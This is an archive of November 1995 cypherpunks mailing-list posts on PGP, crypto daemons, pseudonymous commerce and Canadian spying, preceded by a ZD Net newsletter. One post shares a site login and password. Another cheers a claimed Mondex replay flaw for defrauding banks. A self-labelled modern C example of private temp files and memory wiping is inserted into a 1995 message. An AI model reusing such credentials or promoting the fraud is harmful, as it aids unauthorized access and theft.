*     *     *     *     *     *     *     *     *     *

ZIFF-DAVIS PREMIERES ZD INTERNET LIFE ON THE WORLD WIDE WEB

This month marks the debut of ZD Internet Life (http://www.zdnet.com/zdil/), 
the first interactive magazine designed from the ground up around a Web site. 

Combining a magazine, a Web site, and a CD ROM, ZD Internet Life is focused
on using the Internet for fun, profit, and personal growth. The editorial
staff is headed by Bill Machrone, ZD Internet Life's Editor-in-Chief,
Ziff-Davis's Vice President of Technology, and one of computer journalism's
most respected stars. It also includes Web doyenne Angela Gunn and Associate
Editor Lisa Holzer.

Together with expert reviewers, ZD Internet Life's staff picks "The Best"
sites and provides a top-to-bottom listing of "The Rest" of the sites that
address a given topic under the categories of fun, profit, and personal
growth. Readers who visit the Web sites will be able to add their opinions
to an online database of site reviews. 

The content of the Web site is a superset of what will appear in the magazine
and on the CD ROM. In the words of the ZD Internet Life editors, "ZD Internet
Life is a Web site with an accompanying magazine. In other words, what you see
right here is a lot like what you'll see on your local  newsstand three months
from now. Make sense? Welcome to the future of publishing."

*     *     *     *     *     *     *     *     *     *

TRUE INTERACTIVE REALITY ARRIVES ON ZD NET

Blast off into the future with ZD3D (http://www.zdnet.com/~zdi/vrml),
a new interactive virtual reality area on ZD Net. Designed to serve as the 
preeminent source for interactive virtual reality on the Internet, ZD3D 
provides users with a rich and evolving virtual reality site, direct access
to other 3D Web sites, and a wealth of news, events, articles, and commentaries
focusing on virtual reality.  

ZD3D's design is based on Virtual Reality Modeling Language (VRML), a
technology standard created by Tony Parisi and Mark Pesce that makes 3D
environments on the Internet accessible through a standard PC. Users will feel
as if they're actually strolling around 3D Web sites at will, obtaining
information in the form of graphical, three-dimensional metaphors. In building
the area, ZDI obtained the support of both Pesce and Parisi, who will
contribute exclusive VRML commentaries and updates to ZD3D. In addition, Parisi
helped ZDI build the ZD3D site through Intervista Software, his VRML technology
and consulting firm.

When ZD Net users click on ZD3D, they're given several options, including hot
news; Parisi and Pesce's commentaries; the WorldView VRML browser from
Intervista Software and other VRML browsers; and Terminal Reality, ZD3D's
interactive virtual reality experience. The WorldView browser can be downloaded
for free, enabling users to access the Terminal Reality world and launch to the
other 3D Web sites available there.

Once in, users navigate through a virtual airport, complete with departure 
gates to other interactive 3D Web sites, a central newsstand, and 
advertisements on walls and vehicles. Users are transported to 3D sites via a 
wide range of vehicles, including rockets, jets, ships, buses, and trains. Over 
the next six to nine months, ZD3D will include 3D chat, animated objects, and 
3D sound.

Experience the brave new world of virtual reality on the Web. Experience ZD3D 
today!

*     *     *     *     *     *     *     *     *     *

ANNOUNCING SNAP SOLUTIONS TO COMPLEX PROBLEMS

Just don't have enough time to design your own home page? Relax, help is on the 
way.  

The ZD Net How To Design Your Own Home Page SnapSolution 

     http://www.zdnet.com/~zdi/software/snapsol/snapmain.html

provides all the knowledge you need to stake a claim on the World Wide Web and
to put up your own site for the whole world to see. This informative,
entertaining guide offers a step-by-step tutorial, using programs chosen from
the thousands of files in ZD Net's shareware libraries as well as colorful
screen shots illustrating the key points.

SnapSolutions offer hands-on, step-by-step advice on how to make your life more
productive using shareware. Appearing each month, SnapSolutions will focus on
both computing and non-computing goals alike. The next two SnapSolutions will
help you create your own screen saver and holiday greeting cards.

SnapSolutions: shareware at its best.

*     *     *     *     *     *     *     *     *     *

MEASURE THE HEALTH OF THE NET WITH THE INTERNET INDEX

Got an extra couple of grand burning a hole in your pocket? Maybe it's time you 
invested in the Internet.

Introducing the Inter@ctive Week Internet Index, or @Net Index,

     http://www.hydra.com/interactive_week.html

a collection of 37 Internet-related companies that give investors a formal
measure of the performance of the emerging Internet industry.

The @Net Index, which trades under the symbol IIX, was developed by Inter@ctive
Week and the American Stock Exchange to better measure the performance of
businesses associated with the Internet. It does this by focusing on select
Internet service providers, commercial online service companies, Internet tool
companies, multimedia publishers, and networking companies. The @Net Index also
includes providers of technology expected to shape the future of the Internet,
such as videoconferencing and interactive television.

The @Net Index is a bona fide investment vehicle; options contracts on it will
trade every business day on the floor of the American Stock Exchange. Investors
will trade options based on the direction the index takes, over time. Initial
expiration months are November and December 1995; January, April, and July
1996.

The @Net Index closed Oct. 17 at 215.04, up 52 percent since the beginning of
1995. The Standard & Poor's 500 was up 28 percent for the same period.

For more information about investing in the Index, call (800) THE-AMEX or check
out the AMEX's Web site at http://www.amex.com. The Inter@ctive Week Web site 
(http://www.zdnet.com/~intweek) provides trading updates.

*     *     *     *     *     *     *     *     *     *

ZD Net Update is the official newsletter of ZD Net/World Wide Web Edition. It
is compiled by Tom Schmidt (tom_schmidt@zd.com). Feel free to respond with any
news, notes, comments, or suggestions. To unsubscribe to ZD Net Update, point
your browser to:

     http://www.zdnet.com/cgi-bin/ziffmail.pl/update

and select 

     "Unsubscribe to ZD Net Update."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sun, 19 Nov 1995 03:36:01 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <199511181441.JAA02040@homeport.org>
Message-ID: <Pine.SUN.3.90.951118131853.27991A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 Nov 1995, Adam Shostack wrote:

> 	A daemon per user, or per machine?  Either way, I think you
> run into problems on a big multi-user machine.  (Either its an extra
> process or two per person, or its a great target for attack &
> subversion.

	Not any more of a target for attack than a shared library.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Sun, 19 Nov 1995 05:11:35 +0800
To: cypherpunks@toad.com
Subject: Re: RealAudio website TEMPORARY PASSWORD
Message-ID: <v02130504acd3f2635e65@[204.144.184.50]>
MIME-Version: 1.0
Content-Type: text/plain


>
>          Username: cpunks
>TEMPORARY Password: New.Norfolk
>
I assume that temp password will be changed to cypherpunks soon.

Note that

          Username: cypherpu   [8 char limit]
          Password: cypherpunks

also works.  Someone set it up a few months ago.

Richard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdavidm@iconz.co.nz (David Murray)
Date: Sun, 19 Nov 1995 10:01:26 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymity and Intellectual Capital
In-Reply-To: <199511160148.RAA18908@jobe.shell.portal.com>
Message-ID: <pnr598536982o@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To pick up on a couple of Professor Post's ideas - limited liability of
untraceable pseudonyms, and choice of rule sets in cyberspace (see Post,
"Anarchy, State, and the Internet: An Essay on Law-Making in Cyberspace"
1995 J Online Law art 3), I suggest that arbitration is well suited to
pseudonymous commerce, and  propose the use of an old device - the 
unincorporated, or deed of settlement, company.

Contract seems likely to be the basic building block of pseudonymous digital
commerce for the foreseeable future (barring a mathematical solution to the
non-repudiation problem). But, of course, contracts have to be enforced in
courts, which opens the whole thing to state intervention a la the
unenforceability of gambling contracts etc, and, generally requires the nym to front
up with some form of True Name to launch or defend proceedings...

On the other hand, ADR is hot, and arbitration has long been encouraged as a
method of settling commercial disputes without troubling the courts. It seems
to be getting easier to enforce arbitral awards and harder to appeal them, or
to bypass the arbitration in the first place.

And it is becoming easier to specify your own arbitration procedures (for
instance, those suited to pseudonymous parties presenting argument and evidence
untraceably via the net) and even to specify the substantive law of the 
arbitration, which need not be the law of any state (eg the UNCITRAL contract
law, or even "those laws accepted in international commerce").

So it would be possible for arbitral tribunals specially adapted to
pseudonymous digital commerce to somewhat shield transactions from the
procedural and substantive laws of any state that makes enforcement of those
transactions problematic.

Now, as Prof Post points out, the limited liability corporation is an efficient
device for the pooling of capital and the taking of business risks. But the
grant of incorporation is by the State, and the State usually requires certain
information - such as the name and address of the stockholders - as a
condition of that grant.

The last time State granted incorporations were in short supply, the merchants
of Britain developed (or redeveloped) the deed-of-settlement company -
essentially a partnership with a Board of managing partners, the assets of the
partnership vested in trustees, and the shares in the partnership easily
transferrable.

There were two major drawbacks to the deed of settlement company (which didn't
stop them being very popular, or their shares being widely traded):

1. Under the procedural laws of the day it was very difficult to sue or be
sued, because all of the partners (ie shareholders) at the time the cause of
action arose had to be named in the action. This was ameliorated by the use
of arbitration, and, occasionally, courts allowed the trustees to sue for
the company.

2. Lack of limited liability - a partner is personally liable for all the debts
of the partnership. This was ameliorated by providing in contracts entered
into by the company that recourse could only be had to partnership assets - and,
of course, by the difficulty of suing such companies.

Both these can, at least partially, be overcome in pseudonymous digital
commerce - the first by the use of arbitration, and by more flexible modern
procedural rules (although, depending on the jurisdiction, this may not be a
complete answer); the second by the inherent limited liability of an
untraceable digital pseudonym.

Now, with a corporation in a tax haven jurisdiction acting as trustee (to
more than one company, potentially), someone/something acting as a registry
(attending to the transfer of shares in the company, and potentially many
other companies), an account at Mark Twain (held by the trustee company), and
an appropriate deed of settlement (or partnership agreement)  - oh, and some
object for the company - and now you've got something to do with your digicash!

;-)

As an historical aside, the reason unincorporated companies died out in Britain
was that they were outlawed when the general incorporation acts were
introduced - or, rather, existing companies were encouraged to incorporate
(where their deeds became their articles of association, and the objects of
the trust became the memorandum of association) and new ones were outlawed as
oversize (somewhere between 10 and 25, at various times) partnerships. In
England and Australia, at least, the prohibition on outsize partnerships still
continues, and special exceptions have to be made for Chartered Accountants,
Solicitors and architects.

Unincorporated companies were not so popular in the US (although Alexander
Hamilton (?) originally organized the Bank of New York as one) because, after
the revolution, general incorporation statutes were quick to be passed. (Which,
incidentally, is why the Commonwealth has companies and shares and articles,
and the US has corporations and constitutions and stocks. [Canada is the
exception that proves the influence of geography over history.]) On the other
hand, the Massachusetts (?) Business Trust can be seen as the ultimate
development of the concept (or, at least, that's what I read somewhere).

Dm.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMK0wFllo3j8JHzalAQFlZQQAnHmFwb4i+vbDRZDnZzn3himkhK8WXXRg
o5cKLOCA0I/7k1NZJrwvMKP8CxV6GxZIyNOTNvXnjKffzcDg5HP2uRHRZTQLVg0H
6zPVMORBdWFKs7LTK40CBViJlQAEGTUdYSAdqgKy0+KlBvs6fyGS8va/3gs2voYv
7qqt1NleQhU=
=l9ff
-----END PGP SIGNATURE-----

[Palmtop News Reader - Beta Version 3]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 19 Nov 1995 07:37:02 +0800
To: cypherpunks@toad.com
Subject: Re: CANADIAN PRESS REPORTS (was Re: CSE gets flak on TV)
Message-ID: <199511182325.PAA04123@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> >Taking three successive news stories from three days ... (press stories,
> >I've since pulled for my own reference) and pasting them together to
> >indicate some type of Machiaevellian?? (sp) exercise is simply "not done." 
> 
> I still feel such a sense of violation with what LD did, such an utter
> sense of helplessness at the character assassination I've suffered at his
> hands, that I feel that I must take some token action to "set the
> record straight".  Something which clears my name.
> 
> Here is the TRUE unedited story for the list which Deitweiler felt he
> had to TWIST to the nth degree.  His attempt at making mountains out
> of mole hills will not succeed with this one.

This story truly is a non-starter.  Big deal.  It really has no
relevance to this international list.  This is simply a Canadian matter.

So Canada spied on its allies -- Mexico and South Korea particularly --
and possibly picked up some information which helped Canada to outbid
the United States on a lucrative wheat deal with China.

So what??  As they say ... you snooze you lose.  

Deitweiler's attempt to get American farmers into the picture isn't
going to work.  The part about wheat sales isn't even remotely
relevant to the story.  It's a single paragraph.

CSE has a mandate and follows it.  No one needs to listen to
Deitweiler's rantings and whinings, and his so-called outrage.

As the box at the end of the story shows, Canada simply doesn't
currently have the budget to do a really broad search of the United
States or Mexico.  It just can't pick up every American's phone calls.

The story isn't about that.  It's simply about listening in on a
woman's phone call to her doctor.  His attempt to make more out of
this than what is actually there, and in the process to sully my good
name won't work.

Let the readers judge for themselves, based on the ORIGINAL stories
rather than LD's cut and paste and his personal *commentary*.  And
hopefully no one will judge me, for his words.  

Let the story simply speak for itself.




SPY WORLD
Electronic snooping part of the trade game with friendly countries

Intelligence agencies comb the airwaves for useful data

Jim Bronskill
The Canadian Press
OTTAWA

  Intelligence experts said Monday it's no big secret that Canada's
high-tech spy agency snoops on friendly countries for financial gain.
  Increasingly, intelligence agencies around the world are using their
antennas, computers and codebreakers to gather economic information,
said Wesley Wark, a University of Toronto history professor.
  Some of Canada's largest trading partners -- including the United
States, France and Japan -- comb the airwaves for useful information,
so Canada would be foolish not to join the game, said Wark.
  "I don't know what a friendly power in the economic sphere is,
exactly, these days," he said.  "That seems to be a very ambiguous
term."
  Canada's secretive Communications Security Establishment -- an arm
of the Defence Department -- collects and analyses communications
traffic on the activities of foreign states, corporations and people.
  Jan Shorten, a former CSE employee, told CTV News in an interview
Sunday the agency spied on Canada's allies and trading partners --
including Mexico and South Korea -- by eavesdropping on embassies,
consulates and diplomats.
  In a follow-up segment for broadcast Monday, Shorten said the CSE
frequently intercepted telephone conversations and faxes of Canadians
working at foreign embassies in Canada.
  The government acknowledged earlier this year it uses CSE data to
help develop foreign and defence policies.
  In New Zealand where a meeting of Commonwealth countries just
wrapped up, Prime Minister Jean Chretien did not deny Canada is spying
on allies.
  "This is an organization that works within the law of Canada,"
Chretien told reporters. "They do not report to me on a daily basis
and I cannot make any comments on if they are spying on anybody, I
don't know.
  "But they have a mandate to check a few things around the world.
Probably somebody is listening to us at this moment."
  The prime minister also said that if any laws have been broken,
"somebody will have to pay the price."
  In a book published last year, former CSE employee Mike Frost told
how the agency electronically picked up information that helped Canada
outbid the United States on a lucrative 1982 wheat deal with China.
  Such clandestine behaviour may be unethical, but countries do it,
said U.S. journalist David Kahn, who has written extensively on
intelligence matters.
  "It's just too valuable to give up," said Kahn, a visiting historian
at the National Security Agency, the CSE's much larger U.S. cousin.
  "I wouldn't be surprised if the United States was trying to break
Canadian codes."
  Ottawa maintains that the CSE, the NSA and their counterparts in
Britain, Australia and New Zealand have all agreed not to spy on each
other.
  The government also says the CSE does not target Canadians and
scrupulously abides by Canadian laws.
  Shorten said the CSE stepped up its operations against foreign
embassies in Canada in 1991.  She recalled hearing conversations of
Canadians employed there -- even one woman's phone call to her doctor.
  An appalled Shorten eventually confronted her boss, who assured her
the practice was legal.
  The agency is obligated to destroy information about Canadians it
scoops up in its electronic net, said Wark.  A rare exception might be
a phone call describing a terrorist plot.

[The story also had a little box with some Quick Facts in it]


                   QUICK FACTS

 EMPLOYEES:  About 900
 
 1995-96 BUDGET: $113 Million

 HQ:   Sir Leonard Tilley Building, 
       behind a three metre fence tipped
       with barbed wire in south Ottawa.

 ROLE: Secretive arm of Defence Department monitors and analyses
       communications about activities of foreign states, corporations
       and individuals.  Also helps government stop Canadian signals
       from being intercepted.

SHARES: Intelligence with counterparts in United States, Britain,
        Australia, New Zealand.



And that's all she wrote ... 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Sun, 19 Nov 1995 00:09:02 +0800
To: cypherpunks@toad.com
Subject: protecting against impersonation (was: CANADIAN PRESS REPORTS)
Message-ID: <29172.9511181558@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



anonymous writes:
> I still feel such a sense of violation with what LD did, such an
> utter sense of helplessness at the character assassination I've
> suffered at his hands, 

So use PGP, sign your messages.  Simple solution.

> that I feel that I must take some token action to "set the record
> straight".  Something which clears my name.

This post wasn't signed off, but I presume you are "Alice d'nonymous",
it would help lots if you could get yourself an account with a nym
server, such as alpha@c2.org.  That would have the advantages that
your email address would be recognizable, and that people could reply
to you if they wanted to.

If having a working reply address bothers you, well at least sign your
posts, if you're concerned about a persistent identity, the tools are
available to do it.  Complaining about things which have simple
technological solutions won't get you much sympathy.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Sun, 19 Nov 1995 08:23:11 +0800
To: "'cypherpunks@toad.com>
Subject: Visual Basic 4.0 encryption prog.
Message-ID: <01BAB5D0.4CBEAEE0@king1-04.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


	I just scored a copy of visual basic 4.0 and I was wondering how feasible it would be to write a program for Window$ 95 that would use RSA or IDEA and the Win95 exchange interface. I plan on buying Applied Cryptography probably on Fri. when I get paid.
	My requirements/goals are: 100% compatibility with M$ Exchange, ease of use (Point & Click/ drag & drop) and last but not least, STRONG public key encryption using "off-the-shelf" code. 
	So my ??? Is this: Is it possible? Or should I just go out and buy a C++ compiler.
I don't really care about ITAR or any of that other BS, I just won't put MY name on it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Mon, 20 Nov 1995 13:36:29 +0800
To: "'cypherpunks@toad.com>
Subject: RE:
Message-ID: <01BAB6A0.530885C0@king1-12.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain




----------
From:  anonymous-remailer@shell.portal.com[SMTP:anonymous-remailer@shell.portal.com]
Sent:  Friday, November 17, 1995 7:31 PM
To:  cypherpunks@toad.com

Subject:  Shoe-horning Mondex onto the Internet -- still won't fit

>+ According to inside sources, is grossly vulnerable to replay attacks 
>(offline multi-spending to different parties)
>-- Mondex has security holes
>-- Customers who defraud Mondex-using banks have legal deniability in a 
>court of law: they can simply request banks to produce the security 
>protocols as evidence; if they refuse the case is thrown out of 
>court (precedent: UK and US phantom-ATM withdrawal cases)

HEY-sounds GREAT to me, I'm ALL FOR IT!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 19 Nov 1995 05:31:26 +0800
To: Raph Levien <raph@c2.org>
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <199511181926.LAA26947@infinity.c2.org>
Message-ID: <Pine.3.89.9511181615.A21921-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 18 Nov 1995, Raph Levien wrote:

>    An even better solution is to design the cryptosystem so that it
> doesn't _need_ temp files in the first place. MOSS wins, PGP loses. I
MOSS?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com (James A. Donald)
Date: Sun, 19 Nov 1995 23:17:59 +0800
To: cypherpunks@toad.com
Subject: Recompiling PGP 2.6.2i under microsoft.
Message-ID: <199511191508.HAA19053@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


I am trying to recompile  PGP 2.6.2i under Microsoft's VC 1.5.

Unfortunately the makefile pgp.mak is configured for Borland's C
compiler and linker, and the makefile pgppwb.mak gives me a bunch of
link time errors.

Is there someone around who has been there and done that?

Is this just a trivial edit or a serious rewrite?

C:\PGP\PGP.SRC\SRC> nmake -f pgppwb.mak

[....]

Libraries [.lib]:
Definitions File [nul.def]:  /NOI /STACK:12288 /BATCH /ONERROR:NOEXE /EXE /FAR /PACKC;

RSAGEN.obj(rsagen.c) : error L2029: '_rsa_public_decrypt' : unresolved external
CRYPTO.obj(crypto.c) : error L2029: '_rsa_public_decrypt' : unresolved external
RANDOM.obj(random.c) : error L2029: '_randPoolGetByte' : unresolved external
RANDOM.obj(random.c) : error L2029: '_randPoolStir' : unresolved external
CRYPTO.obj(crypto.c) : error L2029: '_rsa_public_encrypt' : unresolved external
IDEA.obj(idea.c) : error L2029: '_randPoolGetBytes' : unresolved external
RANDOM.obj(random.c) : error L2029: '_randPoolAddBytes' : unresolved external
RSAGEN.obj(rsagen.c) : error L2029: '_rsa_private_encrypt' : unresolved external
CRYPTO.obj(crypto.c) : error L2029: '_rsa_private_encrypt' : unresolved external
RANDOM.obj(random.c) : error L2029: '_sleep' : unresolved external
RANDOM.obj(random.c) : error L2029: '_noise' : unresolved external
PGP.obj(pgp.c) : error L2029: '_noise' : unresolved external
CRYPTO.obj(crypto.c) : error L2029: '_rsa_private_decrypt' : unresolved external


NMAKE : fatal error U1077: 'LINK' : return code '0x2'
Stop.


 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.

http://www.jim.com/jamesd/      James A. Donald       jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Anarchives <tao@presence.lglobal.com>
Date: Sun, 19 Nov 1995 01:06:11 +0800
To: cypherpunks@toad.com
Subject: pgp on bsdi 2.0
Message-ID: <Pine.BSD/.3.91.951118165249.10950A-100000@presence.lglobal.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi, I'm having trouble getting pgp compiled on bsdi 2.0.

Can someone who has successfully done this please email me with some help :)

thanx

	http://www.lglobal.com/TAO/
         ___         ___            ___
        /  /\       /  /\          /  /\
       /  /:/      /  /::\        /  /::\
     /  /:/       /  /:/\:\      /  /:/\:\
    /  /::\      /  /:/ /::\    /  /:/  \:\   
   /__/:/\:\    /__/:/ /:/\:\  /__/:/ \__\:\     
   \__\/  \:\   \  \:\/:/__\/  \  \:\ /  /:/ 
        \  \:\   \  \::/        \  \:\  /:/
         \  \:\   \  \:\         \  \:\/:/
          \  \:\   \  \:\         \  \::/
	   \__\/    \__\/          \__\/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 19 Nov 1995 09:32:38 +0800
To: cypherpunks@toad.com
Subject: Spammers' Email List Obtained!!!
Message-ID: <Pine.ULT.3.91.951118170439.9992B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Using only the tools provided by the spammer, and without compromising
system security in any way, we have obtained the full list of email
addresses that were used by the bulkd@valleynet.net direct email spammer.
I am not going to tell the public how to get it because I do not want this
list to fall into the wrong hands. 

There are several curious features about the list that strongly suggest
that it was purchased from other spammers. I *strongly encourage* the
person who formerly used the bulkd@valleynet.net account to apologize to
news.admin.net-abuse.misc and provide us with the source of the list
immediately. 

- -rich
 llurch@networking.stanford.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMK6E943DXUbM57SdAQHopwP/aY+cRnmrtUBhILl7lvfeQakrpW+uLwuY
J1jR6SrSFdiZ+rGM8D4tc5HarOrU77X2zjpqDNOFySJ+yukP3eXvKny3v+3ndUGA
ozbnH5EnshOQZE0hQ+aV9TKu+zM0ihfT65PxuvgehPnBi+CgSRHtDddhjuWMvRSD
aNGKoAyZLaA=
=mKyw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 19 Nov 1995 02:26:35 +0800
To: cypherpunks@toad.com
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <199511181441.JAA02040@homeport.org>
Message-ID: <Pine.BSD.3.91.951118163828.463A-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 Nov 1995, Adam Shostack wrote:

> Raph Levien wrote:
> 
> |    I propose that the new interface lives as a sort of daemon, rather
	[snip]
> | 
> 
> 	A daemon per user, or per machine?  Either way, I think you
> run into problems on a big multi-user machine.  (Either it's an extra
> process or two per person, or it's a great target for attack &
> subversion.
> 
        _anything_ that has open access on a piece of hardware is a point
     of intrusion --sendmail for instance, or open password files, etc. 
     the issue is trading off risks to _maximize_ security and 
     impenetrable access.

        even assuming we were to post 100% of the source code, a
     translation daemon is a _translation_ model --even if it is capable
     of translating pgp, garbage in equals nothing out...

        one of the biggest problems with _any_ crypto system, and pgp is 
     no exception, is tmp files, followed closely by insecure memory.
     insecure memory is a separate issue, but some of the temporary file
     problems can be relegated to reduced risk by passing the daemon the
     user's preferred location for tmp file --for instance, on any net
     access machine, I globally specify TMP, TEMP, etc to a local tmp
     directory which is at least somewhat safer than public tmp files.
     obviously, you expect the daemon to wipe clean each memory block 
     before it free()s it --I'm sure we all have routines handy for that.

        presuming the daemon is constructed so it can only respond to its
     current process owner, this leaves the security problem of swapping 
     in a daemon which also responds to an interloper --and this same risk
     applies to a libpgp or a .dll file (more so to a .dll file) to an 
     even greater degree.  However, if a daemon is swapped, the system has
     a more _serious_ problem with the system administrator, not the
     daemon.

        if the IPC strings are intercepted in the daemon initialization, 
     again we have a basic hardware and system security problem.

     Even if Raph Levien believes daemons are serious risk problems 
     (which they can be if not properly implemented), I do not agree that 
     the libpgp() or .dll offer anything additional.  I don't presume to 
     believe that anything is safe anyway, just safer than the
     alternative.

        NB:  _nothing_ should ever be assumed secure! 

             assumption is fuckup's mother.  

        one must hope to have considered every possible line of attack, 
     and a few which have not been conceived, which goes back to our
     cypherpunk "credo" which says that private standards are not safe
     --let's all have at it --even if we break it, there probably is a way
     to block the attack, we just did not block it or consider it the
     first time,
     
        I have been playing with all three approaches, and I keep going 
     back to the daemon despite the fact it is not portable to the brain
     dead. 

             I don't know if W95 permits daemons as I have ignored MS
             for a number of years --if I can not run as many processes
             as I want without some MickeySoft program blowing away a
             day's work.... I presume NT will run 'em, and maybe the 
             next release of NT will be more useable, more secure, and
             more stable.

        Since pgp() has been pulled from crypto10, I need to modularize 
     pgp to a pgp() and include the relevant goodies such as MIME and its 
     variations.  And, of course, we need all the "we do it here" types to
     buy into a standard interface.

        And, to add fuel:  the module needs the ability to encode and 
     place clear text into a MIME format specified by the calling program.

> 	It's an interesting proposal, but let me ask you this--Why is
> it better than a libpgp (or pgp.dll) that offers a variety of services
> to programs at multiple levels (ie, offers full one call RSA/IDEA
> encryption and compression, as well as ascii armoring, or offers each
> of those as a separate function.
> 
	not necessarily better. but a valid approach IMHO.  I for one 
     think it would be easy enough to sell IAPs on a daemon.

> 
> 
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 
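
The two precautions attila describes above, a user-chosen temp directory instead of the public one and wiping each memory block before free(), sketched in C as an added example that is not part of the original message or of PGP. The function names and the ownership/permission test are assumptions of this example; it checks only the directory itself, not its parents.

```c
/* Added example: user-private temp files and wipe-before-free.
 * Function names are hypothetical; nothing here is PGP's own code. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Zero a buffer through a volatile pointer so the stores are not
 * optimized away as dead writes just because free() follows. */
void secure_wipe(void *p, size_t n)
{
    volatile unsigned char *v = (volatile unsigned char *)p;
    while (n--)
        *v++ = 0;
}

/* Wipe first, then release. The caller passes the size it allocated. */
void wipe_and_free(void *p, size_t n)
{
    if (p == NULL)
        return;
    secure_wipe(p, n);
    free(p);
}

/* 1 only if dir is a real directory (not a symlink), owned by the
 * effective user, and not writable by group or others. A shared,
 * world-writable /tmp fails this test by design. */
int is_private_dir(const char *dir)
{
    struct stat st;
    if (lstat(dir, &st) != 0 || !S_ISDIR(st.st_mode))
        return 0;
    if (st.st_uid != geteuid())
        return 0;
    return (st.st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* First of TMPDIR, TMP, TEMP that names a private directory, else NULL.
 * There is deliberately no fallback to a public directory. */
const char *preferred_tmp_dir(void)
{
    static const char *const vars[] = { "TMPDIR", "TMP", "TEMP" };
    for (size_t i = 0; i < sizeof vars / sizeof vars[0]; i++) {
        const char *d = getenv(vars[i]);
        if (d != NULL && *d != '\0' && is_private_dir(d))
            return d;
    }
    return NULL;
}

/* Create a scratch file (mode 0600, O_EXCL via mkstemp) and unlink it at
 * once, so no name is left behind; it vanishes when the descriptor closes. */
int open_scratch_file(const char *dir)
{
    char path[4096];
    int n = snprintf(path, sizeof path, "%s/scratchXXXXXX", dir);
    if (n < 0 || (size_t)n >= sizeof path)
        return -1;
    mode_t old = umask(077);
    int fd = mkstemp(path);
    umask(old);
    if (fd < 0)
        return -1;
    if (unlink(path) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

int main(void)
{
    const char *dir = preferred_tmp_dir();
    int fd = dir ? open_scratch_file(dir) : -1;
    if (fd < 0) {
        fprintf(stderr, "no usable private temp dir in TMPDIR/TMP/TEMP\n");
        return 1;
    }
    size_t n = 64;
    unsigned char *secret = malloc(n);
    if (secret == NULL)
        return 1;
    memset(secret, 0xA5, n);          /* constructed stand-in for key material */
    ssize_t w = write(fd, secret, n); /* intermediate data goes to the scratch file */
    wipe_and_free(secret, n);
    close(fd);
    return w == (ssize_t)n ? 0 : 1;
}
```

Wiping the heap copy does not clear what was written to disk or paged out, which is the "insecure memory" issue the message sets aside as separate.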





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 19 Nov 1995 08:06:31 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: CANADIAN PRESS REPORTS (was Re: CSE gets flak on TV)
In-Reply-To: <199511182325.PAA04123@jobe.shell.portal.com>
Message-ID: <199511182351.SAA00184@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I hope everyone realizes that Detweiler is probably arguing with
himself, three levels deep. I must admit that the levels he stoops to
in order to draw attention to himself are pathetic. Why don't you just
stick to posting as Vlad Nurzi? It's more dignified.

anonymous-remailer@shell.portal.com writes:
> On Sat, 18 Nov 1995 anonymous-remailer@shell.portal.com wrote:
> 
> > >Taking three successive news stories from three days ... (press stories,
> > >I've since pulled for my own reference) and pasting them together to
> > >indicate some type of Machiaevellian?? (sp) exercise is simply "not done."
 
> > 
> > I still feel such a sense of violation with what LD did, such an utter
